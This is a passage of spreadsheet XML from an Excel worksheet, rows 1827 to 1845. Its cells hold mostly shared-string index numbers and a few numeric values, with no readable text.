      <c r="I1827" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1827" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K1827" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1827" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1827" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1827" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1827" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1827" s="12">
        <v>2.6</v>
      </c>
      <c r="Q1827" s="12">
        <v>2.6</v>
      </c>
      <c r="R1827" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1827" s="12" t="s">
        <v>13263</v>
      </c>
      <c r="T1827" s="12" t="s">
        <v>13259</v>
      </c>
      <c r="U1827" s="12" t="s">
        <v>13264</v>
      </c>
      <c r="V1827" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W1827" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1827" s="12">
        <v>5</v>
      </c>
      <c r="Y1827" s="12" t="s">
        <v>13265</v>
      </c>
    </row>
    <row r="1828" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1828" s="12">
        <v>9712</v>
      </c>
      <c r="B1828" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1828" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1828" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1828" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1828" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1828" s="12" t="s">
        <v>13266</v>
      </c>
      <c r="H1828" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1828" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1828" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K1828" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1828" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1828" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1828" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1828" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1828" s="12" t="s">
        <v>13267</v>
      </c>
      <c r="Q1828" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1828" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1828" s="12" t="s">
        <v>13268</v>
      </c>
      <c r="T1828" s="12" t="s">
        <v>7813</v>
      </c>
      <c r="U1828" s="12" t="s">
        <v>13269</v>
      </c>
      <c r="V1828" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W1828" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1828" s="12">
        <v>14</v>
      </c>
      <c r="Y1828" s="12" t="s">
        <v>13270</v>
      </c>
    </row>
    <row r="1829" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1829" s="12">
        <v>9714</v>
      </c>
      <c r="B1829" s="12" t="s">
        <v>31195</v>
      </c>
      <c r="C1829" s="12" t="s">
        <v>31196</v>
      </c>
      <c r="D1829" s="12" t="s">
        <v>31504</v>
      </c>
      <c r="F1829" s="12" t="s">
        <v>31197</v>
      </c>
      <c r="G1829" s="12" t="s">
        <v>13271</v>
      </c>
      <c r="H1829" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1829" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1829" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1829" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1829" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1829" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1829" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1829" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1829" s="12" t="s">
        <v>6633</v>
      </c>
      <c r="Q1829" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1829" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1829" s="12" t="s">
        <v>13272</v>
      </c>
      <c r="T1829" s="12" t="s">
        <v>6282</v>
      </c>
      <c r="U1829" s="12" t="s">
        <v>13273</v>
      </c>
      <c r="V1829" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W1829" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1829" s="12">
        <v>1</v>
      </c>
      <c r="Y1829" s="12" t="s">
        <v>13274</v>
      </c>
    </row>
    <row r="1830" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1830" s="12">
        <v>9718</v>
      </c>
      <c r="B1830" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1830" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D1830" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1830" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1830" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1830" s="12" t="s">
        <v>13275</v>
      </c>
      <c r="H1830" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1830" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1830" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K1830" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1830" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1830" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1830" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1830" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1830" s="12" t="s">
        <v>13276</v>
      </c>
      <c r="Q1830" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1830" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1830" s="12" t="s">
        <v>13277</v>
      </c>
      <c r="T1830" s="12" t="s">
        <v>10100</v>
      </c>
      <c r="U1830" s="12" t="s">
        <v>13278</v>
      </c>
      <c r="V1830" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1830" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1830" s="12">
        <v>8</v>
      </c>
      <c r="Y1830" s="12" t="s">
        <v>13279</v>
      </c>
    </row>
    <row r="1831" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1831" s="12">
        <v>9727</v>
      </c>
      <c r="B1831" s="12" t="s">
        <v>30574</v>
      </c>
      <c r="D1831" s="12" t="s">
        <v>30575</v>
      </c>
      <c r="E1831" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1831" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1831" s="12" t="s">
        <v>13281</v>
      </c>
      <c r="H1831" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1831" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1831" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1831" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1831" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1831" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1831" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1831" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1831" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1831" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1831" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1831" s="12" t="s">
        <v>13282</v>
      </c>
      <c r="T1831" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1831" s="12" t="s">
        <v>13283</v>
      </c>
      <c r="V1831" s="12" t="s">
        <v>13284</v>
      </c>
      <c r="W1831" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1831" s="12">
        <v>1</v>
      </c>
      <c r="Y1831" s="12" t="s">
        <v>13285</v>
      </c>
    </row>
    <row r="1832" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1832" s="12">
        <v>9728</v>
      </c>
      <c r="B1832" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1832" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1832" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1832" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1832" s="12" t="s">
        <v>13286</v>
      </c>
      <c r="H1832" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1832" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1832" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K1832" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1832" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1832" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1832" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1832" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1832" s="12" t="s">
        <v>13287</v>
      </c>
      <c r="Q1832" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1832" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1832" s="12" t="s">
        <v>13288</v>
      </c>
      <c r="T1832" s="12" t="s">
        <v>200</v>
      </c>
      <c r="U1832" s="12" t="s">
        <v>13289</v>
      </c>
      <c r="V1832" s="12" t="s">
        <v>13290</v>
      </c>
      <c r="W1832" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1832" s="12">
        <v>2</v>
      </c>
      <c r="Y1832" s="12" t="s">
        <v>13291</v>
      </c>
    </row>
    <row r="1833" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1833" s="12">
        <v>9732</v>
      </c>
      <c r="B1833" s="12" t="s">
        <v>30790</v>
      </c>
      <c r="D1833" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1833" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1833" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G1833" s="12" t="s">
        <v>13292</v>
      </c>
      <c r="H1833" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1833" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1833" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K1833" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1833" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1833" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1833" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1833" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1833" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1833" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1833" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1833" s="12" t="s">
        <v>13294</v>
      </c>
      <c r="T1833" s="12" t="s">
        <v>9999</v>
      </c>
      <c r="U1833" s="12" t="s">
        <v>13295</v>
      </c>
      <c r="V1833" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W1833" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1833" s="12">
        <v>2</v>
      </c>
      <c r="Y1833" s="12" t="s">
        <v>13297</v>
      </c>
    </row>
    <row r="1834" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1834" s="12">
        <v>9734</v>
      </c>
      <c r="B1834" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1834" s="12" t="s">
        <v>30577</v>
      </c>
      <c r="D1834" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1834" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1834" s="12" t="s">
        <v>30616</v>
      </c>
      <c r="G1834" s="12" t="s">
        <v>13298</v>
      </c>
      <c r="H1834" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1834" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1834" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1834" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1834" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1834" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1834" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1834" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1834" s="12" t="s">
        <v>13299</v>
      </c>
      <c r="Q1834" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1834" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1834" s="12" t="s">
        <v>13300</v>
      </c>
      <c r="T1834" s="12" t="s">
        <v>13301</v>
      </c>
      <c r="U1834" s="12" t="s">
        <v>13302</v>
      </c>
      <c r="V1834" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1834" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1834" s="12">
        <v>18</v>
      </c>
      <c r="Y1834" s="12" t="s">
        <v>13303</v>
      </c>
    </row>
    <row r="1835" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1835" s="12">
        <v>9738</v>
      </c>
      <c r="B1835" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1835" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1835" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1835" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1835" s="12" t="s">
        <v>13304</v>
      </c>
      <c r="H1835" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1835" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1835" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1835" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1835" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1835" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1835" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1835" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1835" s="12" t="s">
        <v>12596</v>
      </c>
      <c r="Q1835" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1835" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1835" s="12" t="s">
        <v>13305</v>
      </c>
      <c r="T1835" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1835" s="12" t="s">
        <v>13306</v>
      </c>
      <c r="V1835" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W1835" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1835" s="12">
        <v>4</v>
      </c>
      <c r="Y1835" s="12" t="s">
        <v>13307</v>
      </c>
    </row>
    <row r="1836" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1836" s="12">
        <v>9739</v>
      </c>
      <c r="B1836" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1836" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1836" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1836" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1836" s="12" t="s">
        <v>13308</v>
      </c>
      <c r="H1836" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1836" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1836" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1836" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1836" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1836" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1836" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1836" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1836" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1836" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1836" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1836" s="12" t="s">
        <v>13309</v>
      </c>
      <c r="T1836" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1836" s="12" t="s">
        <v>13310</v>
      </c>
      <c r="V1836" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1836" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1836" s="12">
        <v>2</v>
      </c>
      <c r="Y1836" s="12" t="s">
        <v>13311</v>
      </c>
    </row>
    <row r="1837" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1837" s="12">
        <v>9746</v>
      </c>
      <c r="B1837" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C1837" s="12" t="s">
        <v>30519</v>
      </c>
      <c r="D1837" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1837" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1837" s="12" t="s">
        <v>13312</v>
      </c>
      <c r="H1837" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1837" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1837" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1837" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1837" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1837" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1837" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1837" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1837" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1837" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1837" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1837" s="12" t="s">
        <v>13313</v>
      </c>
      <c r="T1837" s="12" t="s">
        <v>12563</v>
      </c>
      <c r="U1837" s="12" t="s">
        <v>13314</v>
      </c>
      <c r="V1837" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1837" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1837" s="12">
        <v>4</v>
      </c>
      <c r="Y1837" s="12" t="s">
        <v>13315</v>
      </c>
    </row>
    <row r="1838" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1838" s="12">
        <v>9747</v>
      </c>
      <c r="B1838" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1838" s="12" t="s">
        <v>31198</v>
      </c>
      <c r="D1838" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1838" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1838" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1838" s="12" t="s">
        <v>13316</v>
      </c>
      <c r="H1838" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1838" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1838" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K1838" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1838" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1838" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1838" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1838" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1838" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1838" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1838" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1838" s="12" t="s">
        <v>13317</v>
      </c>
      <c r="T1838" s="12" t="s">
        <v>13318</v>
      </c>
      <c r="U1838" s="12" t="s">
        <v>13319</v>
      </c>
      <c r="V1838" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1838" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1838" s="12">
        <v>6</v>
      </c>
      <c r="Y1838" s="12" t="s">
        <v>13320</v>
      </c>
    </row>
    <row r="1839" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1839" s="12">
        <v>9748</v>
      </c>
      <c r="B1839" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1839" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1839" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1839" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1839" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1839" s="12" t="s">
        <v>13321</v>
      </c>
      <c r="H1839" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1839" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1839" s="12" t="s">
        <v>6776</v>
      </c>
      <c r="K1839" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1839" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1839" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1839" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1839" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1839" s="12" t="s">
        <v>13322</v>
      </c>
      <c r="Q1839" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1839" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1839" s="12" t="s">
        <v>13323</v>
      </c>
      <c r="T1839" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1839" s="12" t="s">
        <v>13324</v>
      </c>
      <c r="V1839" s="12" t="s">
        <v>9999</v>
      </c>
      <c r="W1839" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1839" s="12">
        <v>1</v>
      </c>
      <c r="Y1839" s="12" t="s">
        <v>13325</v>
      </c>
    </row>
    <row r="1840" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1840" s="12">
        <v>9751</v>
      </c>
      <c r="B1840" s="12" t="s">
        <v>30438</v>
      </c>
      <c r="D1840" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1840" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1840" s="12" t="s">
        <v>30439</v>
      </c>
      <c r="G1840" s="12" t="s">
        <v>13326</v>
      </c>
      <c r="H1840" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1840" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1840" s="12" t="s">
        <v>270</v>
      </c>
      <c r="K1840" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1840" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1840" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1840" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1840" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1840" s="12" t="s">
        <v>13327</v>
      </c>
      <c r="Q1840" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1840" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1840" s="12" t="s">
        <v>13328</v>
      </c>
      <c r="T1840" s="12" t="s">
        <v>13329</v>
      </c>
      <c r="U1840" s="12" t="s">
        <v>13330</v>
      </c>
      <c r="V1840" s="12" t="s">
        <v>274</v>
      </c>
      <c r="W1840" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1840" s="12">
        <v>7</v>
      </c>
      <c r="Y1840" s="12" t="s">
        <v>13331</v>
      </c>
    </row>
    <row r="1841" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1841" s="13">
        <v>9755</v>
      </c>
      <c r="B1841" s="13" t="s">
        <v>28232</v>
      </c>
      <c r="C1841" s="13"/>
      <c r="D1841" s="13" t="s">
        <v>28349</v>
      </c>
      <c r="E1841" s="12" t="s">
        <v>31520</v>
      </c>
      <c r="F1841" s="13" t="s">
        <v>30368</v>
      </c>
      <c r="G1841" s="13" t="s">
        <v>13332</v>
      </c>
      <c r="H1841" s="13" t="s">
        <v>21</v>
      </c>
      <c r="I1841" s="13" t="s">
        <v>22</v>
      </c>
      <c r="J1841" s="13" t="s">
        <v>4248</v>
      </c>
      <c r="K1841" s="13" t="s">
        <v>37</v>
      </c>
      <c r="L1841" s="13" t="s">
        <v>11536</v>
      </c>
      <c r="M1841" s="13" t="s">
        <v>31582</v>
      </c>
      <c r="N1841" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1841" s="13" t="s">
        <v>31589</v>
      </c>
      <c r="P1841" s="13" t="s">
        <v>12135</v>
      </c>
      <c r="Q1841" s="13" t="s">
        <v>28307</v>
      </c>
      <c r="R1841" s="13" t="s">
        <v>17</v>
      </c>
      <c r="S1841" s="13" t="s">
        <v>13333</v>
      </c>
      <c r="T1841" s="13" t="s">
        <v>2379</v>
      </c>
      <c r="U1841" s="13" t="s">
        <v>13334</v>
      </c>
      <c r="V1841" s="13" t="s">
        <v>5099</v>
      </c>
      <c r="W1841" s="13" t="s">
        <v>20</v>
      </c>
      <c r="X1841" s="13">
        <v>2</v>
      </c>
      <c r="Y1841" s="13" t="s">
        <v>13335</v>
      </c>
    </row>
    <row r="1842" spans="1:25" s="13" customFormat="1" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1842" s="12">
        <v>9756</v>
      </c>
      <c r="B1842" s="12" t="s">
        <v>30202</v>
      </c>
      <c r="C1842" s="12" t="s">
        <v>30203</v>
      </c>
      <c r="D1842" s="12" t="s">
        <v>30163</v>
      </c>
      <c r="E1842" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1842" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1842" s="12" t="s">
        <v>13336</v>
      </c>
      <c r="H1842" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1842" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1842" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1842" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1842" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1842" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1842" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1842" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1842" s="12" t="s">
        <v>13337</v>
      </c>
      <c r="Q1842" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1842" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1842" s="12" t="s">
        <v>13338</v>
      </c>
      <c r="T1842" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1842" s="12" t="s">
        <v>13339</v>
      </c>
      <c r="V1842" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1842" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1842" s="12">
        <v>1</v>
      </c>
      <c r="Y1842" s="12" t="s">
        <v>13340</v>
      </c>
    </row>
    <row r="1843" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1843" s="12">
        <v>9757</v>
      </c>
      <c r="B1843" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1843" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1843" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1843" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1843" s="12" t="s">
        <v>13341</v>
      </c>
      <c r="H1843" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1843" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1843" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1843" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1843" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1843" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1843" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1843" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1843" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1843" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1843" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1843" s="12" t="s">
        <v>13342</v>
      </c>
      <c r="T1843" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1843" s="12" t="s">
        <v>13343</v>
      </c>
      <c r="V1843" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1843" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1843" s="12">
        <v>1</v>
      </c>
      <c r="Y1843" s="12" t="s">
        <v>13344</v>
      </c>
    </row>
    <row r="1844" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1844" s="12">
        <v>9758</v>
      </c>
      <c r="B1844" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C1844" s="12" t="s">
        <v>28492</v>
      </c>
      <c r="D1844" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1844" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1844" s="12" t="s">
        <v>13345</v>
      </c>
      <c r="H1844" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1844" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1844" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K1844" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1844" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1844" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1844" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1844" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1844" s="12" t="s">
        <v>13293</v>
      </c>
      <c r="Q1844" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1844" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1844" s="12" t="s">
        <v>13346</v>
      </c>
      <c r="T1844" s="12" t="s">
        <v>13347</v>
      </c>
      <c r="U1844" s="12" t="s">
        <v>13348</v>
      </c>
      <c r="V1844" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W1844" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1844" s="12">
        <v>7</v>
      </c>
      <c r="Y1844" s="12" t="s">
        <v>13349</v>
      </c>
    </row>
    <row r="1845" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1845" s="12">
        <v>9759</v>
      </c>
      <c r="B1845" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D1845" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1845" s="12" t="s">
        <v>31199</v>
